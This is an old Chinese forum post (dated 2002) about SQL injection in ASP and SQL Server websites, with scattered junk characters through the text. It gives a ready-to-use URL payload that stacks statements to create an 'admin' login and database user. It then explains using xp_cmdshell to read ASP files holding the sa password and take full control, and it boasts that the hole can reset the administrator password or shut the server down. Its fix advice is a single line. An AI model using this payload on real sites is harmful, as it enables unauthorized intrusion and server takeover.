为了考证这种类型的程序BUG,笔者最近去了很多用ASP和SQL SERVER做的网站,发现绝大部分网站的程序有这个BUG,于是觉得有必要把这个问题贴出,以免大家犯同样的错误。6 U2 N& y4 v5 I- I9 L
BUG描述: ?' `* ~0 V1 n0 N' v
把一个有参数的xxx.asp?x=x程序变成xxx.asp?x=x;use pubs;exec sp_addlogin 'admin','admin','master';exec sp_adduser 'admin','admin','db_ower';--& ]3 g# P6 c9 z
BUG讲解:
+ @+ x5 E1 U8 h0 x0 O$ v 这个BUG是利用参数未过滤来执行SQL语句增加一个用户,然后可以用此用户连上SQL SERVER,再通过exec xp_cmdshell 'type x.asp'来查看存有sa密码的ASP文件来获得SQL SERVER的最高权限。 n; z3 N: Q2 Z! _9 Y6 A/ u* J
BUG消除:
! ?$ I0 S3 H; Q" @0 i U 程序增加参数过滤
. L6 }# O4 p0 D 附:sp_addlogin和sp_adduser语法# y: J6 J: n. F5 F
sp_addlogin [@loginame =] 'login'
$ N. }& d+ C) D* y+ @/ O* W [,][@passwd =] 'password'], A; j7 a. Z, ~+ D
[,][@defdb =] 'database']' `" u( n8 T* l" q& q) |
[,][@deflanguage =] 'language']" l/ Z% A0 ^5 o [1 Q3 A5 e+ i
[,[@sid =] 'sid']
9 P. W" d; X; L, O/ ~9 E) x [,][@encryptopt =] 'encryption_option']
+ X- S! i1 L J& O8 M. Tsp_adduser [@loginame =] 'login'3 z+ y& T' f0 [' b4 m
[,][@name_in_db =] 'user']
3 H3 @) ~, V9 v" H( e/ E+ l- r7 ^1 z [,][@grpname =] 'group']4 G& R. H4 a) I' s2 ~% g$ n
注:如果采取SQL SERVER设为本地连接、改变端品号、drop xp_cmdshell等等可以防止很多攻击行为呀 ^_^( f5 m( Y: {& ^# k; P) o
嘿嘿,这个BUG还可以用来改administrator的密码,让服务器关机等等
0 p+ Y$ D: i p |
粤公网安备44152102000001号 
发表于 2002-2-10 17:14:05